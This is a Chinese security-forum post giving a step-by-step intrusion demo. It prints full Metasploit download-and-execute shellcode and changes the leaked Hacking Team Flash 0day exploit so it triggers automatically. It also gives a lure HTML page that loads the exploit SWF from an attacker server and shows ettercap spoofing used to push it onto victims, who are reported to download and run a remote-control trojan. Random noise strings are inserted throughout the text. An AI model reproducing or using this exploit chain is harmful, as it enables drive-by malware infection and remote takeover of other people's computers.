找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1388|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; Z% R7 e, U8 {# P4 ], Z3 y 三、flash 0day之手工代码修改制作下载者实例入侵演示 6 v7 ^ e. H5 i

& }6 f* j% k* ^& g* v$ L, T

* [! j$ D: O; V+ Y) W$ I( J 利用到的工具: 2 p' `& A+ [; y" d% w; ^! y" V3 `

* ? ?" `/ S+ Z0 x' Y

. I1 B. B$ o3 j0 o Msf m) P% a& ^, R2 i- ?: T/ i

; ], ?; g# P2 W1 w8 A* l

; N' o3 J! S6 E6 H Ettercap / C& p1 Q) L5 N4 l

( P# s! B3 r0 \/ a

4 T( |, [+ ]% P8 l" t% n" d3 y Adobe Flash CS6 4 W/ f ^+ l6 u7 Z

* c' @1 f9 K5 P4 V& B, W1 [

8 B. {1 l3 D0 a, f Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 k" ~4 _1 H8 o- ~

1 {! `0 y( \2 T" B- y4 y

. t$ I" E6 I, |+ L 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ; ~0 Z) k4 c0 D9 ^/ ~& r# D

2 A5 v* y& J6 L, d

/ H Q8 J* ]" g, B 如图: 4 y4 B- E5 v! A% l

( h6 [/ R: q* d. I. P

E5 w& q( f1 F- R9 b   4 |+ M0 t* F Q8 E9 j

& g/ V3 A, K6 K( m/ X( P: z+ O! ?+ K! o

- F6 W! t9 V/ e8 O4 L1 c   ! B0 P% G3 r3 P/ x9 u, ]: C" |

2 U& `' D0 J3 b- Y

6 \9 [- w7 o8 |, {% L% w 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / B ~; B7 y7 n, Q

6 @2 B5 D- e! t# R. j& M

$ h' F* T: {% }+ n+ p( S   6 p2 e9 r8 m8 w! s; O3 G* |

# |. p% O' Q0 M

/ o( _" }: a8 _   4 _6 f" ?. B* |4 D5 F: G8 X

" y8 V5 W6 c6 z8 T w

' [! a/ g3 F& V7 K4 v+ G# H 然后执行generate -t dword生成shellcode,如下: $ W1 Q5 W2 u- C: h

: l# N# O2 h, C" N5 ^4 j

6 @* Q ]: S8 j4 I6 }   5 g b& K% P8 \8 @ |

7 \. ~- W) q8 I8 o6 a- } l

! }2 y! ~% d* S' V2 [5 t5 x6 H( L 复制代码到文本下便于我们一会编辑flash exp,如下: . |) D P, w. r/ ~6 L b# Y

" g. w; c$ v* c! p5 |* |0 ?

- Y" r& k; t& ~$ g2 Q. C8 x) j 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, + N# j4 e! p7 F+ d( E

! N C) t0 }3 B; |

# J4 H8 ^! d& C' P 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, r0 z8 j6 Y8 v ]/ g

7 K+ x% E$ l) H7 @

% H. r+ k J- S5 e0 Y9 z: b 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, C' t. F9 Y! M

9 r1 }- N0 p$ w% A9 i; K

, D' O- S9 o5 B* U 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 4 l8 H* \/ r3 n+ e7 V. w

6 k+ S: @6 b0 |0 e% A* M7 Q

! @0 g; R9 a8 r 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 5 D, G2 a7 m7 }' b* a& t# x

! Y) ^' X6 }* H3 {( ]" P% g

) _7 C W4 O$ X7 u0 T; [ 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, % O, b2 z) }0 G

S# I$ {5 {0 z7 o @

3 l3 @) q1 w5 ^3 r 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 ?0 h/ j/ A. z6 }

2 a2 [1 ?; D, K3 v

2 N4 H6 E9 Y3 p. E: \ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, J( t7 K* L% R# S. c/ Y

4 B1 E4 z/ P6 S5 Q5 l

M: V; I" e# [! Q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, * Q, H4 q* b0 H& _. x/ N( S

6 M' I6 ?: Z% M+ q9 n

n! E* k2 y8 b0 l 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, + H `" k( i% y0 f7 M

( K2 @1 }) t! ~+ o. o

$ @- e- Q) ~- F, K5 { y 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, , ~3 r. b& }" w2 k' g5 O9 I" G

, U/ H6 F; n3 m' U( a

. y4 t9 i- f6 G$ {2 \# Q( k 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " q- Q2 j0 ?' g1 O. ?

1 C# u' \2 i- p" n5 ^# A1 ^7 ~

" _; H5 Q2 @' y# h7 H1 y' b) S0 ? 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 6 G. z9 d: l& K, t

( m Q- R/ ?7 o2 {

' }' p3 Q$ R0 J( r" d 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 $ _: t7 m3 H* N- |7 s

1 b2 d$ C; W& f

- l) V" B. C0 W! f6 j) g   5 Z# _' I( }0 {6 K

$ O+ a" [& m' C- ?5 |& B# y

- o, d% Y, n4 y2 j7 A9 k9 Z   5 ]! L3 ?8 A, e# R: v: c4 [

& u* w+ f3 n. V2 l+ F( ~ w

5 U O9 [, A3 Q 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 8 V. R3 m* _- D! `" D

! u6 p0 D8 M0 i" y: |) F0 q

* y6 P% i" v. \2 b; s$ W   8 A" I$ i9 a5 d+ g, J+ [

2 U# e/ H# y0 `! i3 i) D8 m$ j B

) `! \- z% c5 ~; L 先修改ShellWin32.as,部分源代码如图: * F F% M, ?* B/ F

2 k% @/ T% F n' \

0 S- c5 h: a! q! |" C( ?& \: V   1 v# |% A, q" S4 r8 E: g- K

" T' h5 @! l Q3 d' O! E W

1 a9 ?) x3 ^- L3 h* |* W 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 6 w' Y) G) S, J5 b9 A& [, ^

. f; S3 _- S5 Y0 {

& K D4 ^* K6 u/ d5 {6 X1 \   : W/ _) e+ n' w2 ~' C# C+ o8 G9 b$ |

' I# u2 P; D7 ~& M

. g+ D) `/ s6 M 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ! I; U1 v4 b) u( s

0 u" ~9 E/ c1 Z

+ \+ S5 H0 P8 E   , Y! Z* P$ S/ ~3 b! ^! Q

; l4 Y* K6 b9 i+ h: v$ i. v Z

- D2 A0 D9 W6 {, [; G) ? 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 4 @, r/ Y6 W7 H) g# u

2 U. p3 q& I" o

2 d: k/ C5 Q- K   2 E2 S" P2 A- W& `

; [7 @+ W- F7 P2 M8 N& ?

- M+ A& H: l$ v5 |1 M   4 N, D. `" A n1 O8 \) Y7 E

$ O7 g; P! i$ L9 y

1 X5 N8 W2 f; G3 O   , O9 M1 [) G! C4 r3 Z

9 _. p3 `1 @6 {' b* R0 z

- V F, } z$ M9 A 然后点保存,下面我们来编译一下,打开 . w" M( {3 T, S. o! R

( T7 y# P7 f, C6 F# L: Z

6 y- b2 |( j" E& ~3 V8 I exp1.fla然后点文件-发布,看看编译没错误 5 D7 X1 Y1 m e2 u

, t! Y; R. t. X% g# Y$ `2 I3 g

0 c# L: i+ ~, r# U6 D! Q   9 P# ~* f! N! y% {( A( Z, B, u

+ f- E/ |6 J% m" N3 T! c

+ p! } y2 ]: ?6 Y" V7 ]! E   & v P( ~) {# T9 b& t

% I- W, `- `) K, J* F9 L0 m7 M

7 q: R8 b6 Z- m1 @1 ?* T   & \* a) N/ {8 A6 ^

* L) g5 j" i* b1 J& J

+ [' a7 `4 q. X& C7 `) A   9 f' W9 |, I6 l- w" I

( X+ W+ z5 b2 R7 s+ l3 c

2 h s+ n3 [& i 然后我们把生成的 , g* C0 u2 @4 R" h/ O) d

. ]2 t9 o6 S9 b1 |" j3 N8 `

0 o) k1 G' Q" Z- d9 b exp1.swf丢到kailinux /var/www/html下: + x, O- F$ Z; C0 Q( U

) n0 A! ~. e% l9 f5 v. J

* P& l1 x5 T5 k5 k# ] 然后把这段代码好好编辑一下 - F! K$ F x" O$ ?; v$ r

+ T8 B1 U# X; E G6 K

! u" l5 e$ D1 A/ ~" V2 w   % n* v/ x1 P0 B$ L: ^8 e# h

3 U5 }& s8 F! N" t

+ T5 V1 d4 h' b5 Q! m" K   0 W' v( i" J2 O1 y$ I" S4 V9 ]

5 V1 h) l) }$ d& Y# @2 `

& i: A$ z: Q7 j0 i6 j   + k8 q' i2 P4 \0 \! e7 [5 S

. l$ M! e' _, e$ v) G: I% e5 S

8 n6 M0 `. v4 y4 t2 k   4 d: g6 }, G5 e6 R

1 F, I: w- v6 e4 {/ k. ~0 b

4 i9 ^# M' @3 w, ^/ X T* x' w   6 [# C2 v3 W8 [- k+ m

2 a4 F7 T Y2 v# x* I0 C/ B

! Z0 Y$ b7 x4 }. n   ; ~( z* T, V' Z" I8 a

1 ~* E/ x- l( p: G# k( u2 d( P+ X9 b

3 c: p1 i% k G H) g9 ] <!DOCTYPE html> 9 ]+ F2 x. W" @4 X; T. ~* U

) T N' o6 ~* C7 \

. \ C. Z/ o6 a2 u& t7 o <html> ! n- F" \0 \- s7 q% T9 T! q' K

8 w2 n3 k( O' G+ X+ p: b

- `, ?6 [0 O5 q& W <head> ) g( f; ?5 P+ g- l" D. t# x4 @

) K0 G: R, a3 V/ @# ]! K- M

7 `* f. B7 r3 @6 V# _5 m <meta http-equiv="Content-Type" content="text/html; ! T& i4 @/ S; {: _( F7 [% M

E8 C( u' B! M% N

1 j( c8 X/ E+ n charset=utf-8"/> 0 h; e$ ? n* q2 j ?5 ~3 x

& ^. _/ r, ^9 V

2 {; f7 n$ t$ |. I! Z </head> # Y1 N- A% x& E9 `: X: x3 ?

9 ^4 q |9 {# V- A) M; H2 o( b. M

* c7 I4 Y! [$ e# R8 b4 x <body> ) J, E! V& ]8 `7 ?8 t4 J! z! S( W

0 d5 V O2 x4 F% V0 }

8 I1 L6 t# N; q; r9 n" {- K+ Y7 n <h2> Please wait, the requested page is loading...</h2> % c8 \* t" V* z/ T3 M- Z1 b

4 V* {9 V0 i6 u

' [3 c2 b+ P$ y- i+ B <br> 8 G; Q' H* n9 Y0 w

. u2 W; l8 @$ x. z* U' g2 [

" Y X% s9 r$ v" `* M% {( T! n <OBJECT 0 m' U/ z4 Y( U0 v1 e% c# \( w

7 J9 E( j0 Y+ b8 L

7 j- Z- c" J# P classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ( O+ b# R+ }# n, t/ D! \- P

; P* b8 k0 j) x! }6 K0 R: c9 e

1 u; O' o) l7 m% w9 ~) y VALUE="http://192.168.0.109/exp1.swf"></OBJECT> . [( z, x6 G, Y5 i6 Q. u3 ]2 a

* X5 W" t% @2 F+ s i2 K

. ]: Q' d- {: O# _3 E7 |0 i# j1 h </body> ; J5 M. P$ ]% t3 F

]; ~; H2 ]% u" i, X) R0 b

3 u) f" i2 n0 `2 a! @( h <script> ( F8 h" U8 m" q' U1 S! \2 ^. F3 Y

( a6 T; |6 X/ C1 A- g1 i4 P5 T

$ i) ]- }/ H) ?/ G4 t/ u) N     setTimeout(function () { + Y% i8 }; {: L* y

8 S3 [$ F+ `$ K, d

( B/ L7 h( {' J          6 a% C) X$ F0 |$ V* \

/ A& J( e+ C, w& i+ }& d& B

; \9 n' Y: y) f3 z; x window.location.reload(); * M p9 Q% F1 R& G7 F

O7 d1 r9 T) \: r" c

. S) [3 t! @# E6 M     }, 10000); ) T' \0 \" z- k! E1 T

! ]: _' v0 [% Y" }- x Y8 G

4 z+ b" y( p3 O   6 h3 w" p) k8 w9 M% L9 {- A, K

- [7 _% h T* u* f/ x7 I g

+ x( [' W1 g( o) H+ X4 { P </script> , c( {! r5 f( a6 U

2 x& a9 n; M; y3 K3 }% \+ v/ }; |5 h

, C- W; G b X) V9 e3 m# y3 x& r </html> 3 h7 k" A9 o' Z

" m+ ]7 d; r+ O0 P9 t0 T

& N8 Q4 ~" X& [' L/ L   $ `' w* I9 V2 c7 K& c+ T- o

: w3 o1 y3 ^- c& o2 u7 b* s, f

3 `/ D2 W) W( u6 u 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: # _8 g$ N" s# Y4 M' n

5 B/ X) M- V( Z' z, G

- \$ q1 s! R+ v. P/ X6 Q   : t& d. ]* Y6 n X

6 N7 u/ i2 G1 A# G5 {

$ y8 s' V0 w0 J   - M4 q/ H7 A, c! ^& q& x

' E" L/ n& z1 d: U! g' Q

8 P$ `; V5 Q* o( Q   9 t I- K$ S Y& }$ [8 w& m

; }8 Q9 U/ [3 a/ ]6 M' z

; k+ B! \: r8 I   9 E; _# k8 F7 c9 [

! N- H3 v. a( P9 w/ M

+ L' H# l+ o6 D+ `' L8 F( b9 N }' o   5 G8 Z& G2 ?6 w. s

$ @0 _9 @8 E1 A, [* l

" ^$ _- u7 C8 l: h$ s ^ 下面我们用ettercap欺骗如图: 9 D" W, o3 i) {

) F+ I; l- _# [# X

* l: Z" Q, t2 y4 F1 r5 O   ' `0 }2 R9 z: P4 q+ u) o

/ p1 @% v0 u" w6 w; k

5 d9 k3 Q4 S2 t6 g' X8 w, [$ A   ! q2 W8 z$ ?0 a: D2 k+ D

5 X( r9 L4 ]8 i8 o5 Y

4 V6 `) W( R$ \* k# o7 q# Q 下面我们随便访问个网站看看: + f' g1 ~: ~8 B, s

& Q3 L% J7 n1 v) E A

5 [* ?+ w, z. ]8 o 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # Z, \& R. e0 [! }1 Q! v

% O6 y$ ^7 z* _- A$ T6 F2 f6 `# y

& L7 x5 E5 D+ ]& R0 Y   2 n* X8 P, E Q$ f! m' z

! W1 \8 s1 D7 K

[9 K* C' K5 a 我们看另一台, 1 z1 Y% T- P: f/ a, T+ o& f) z+ E

& @9 J( m" {+ g

7 {6 Y9 n# L% L* `! @$ y 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 & T2 k. [% Q6 Q6 @5 E

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表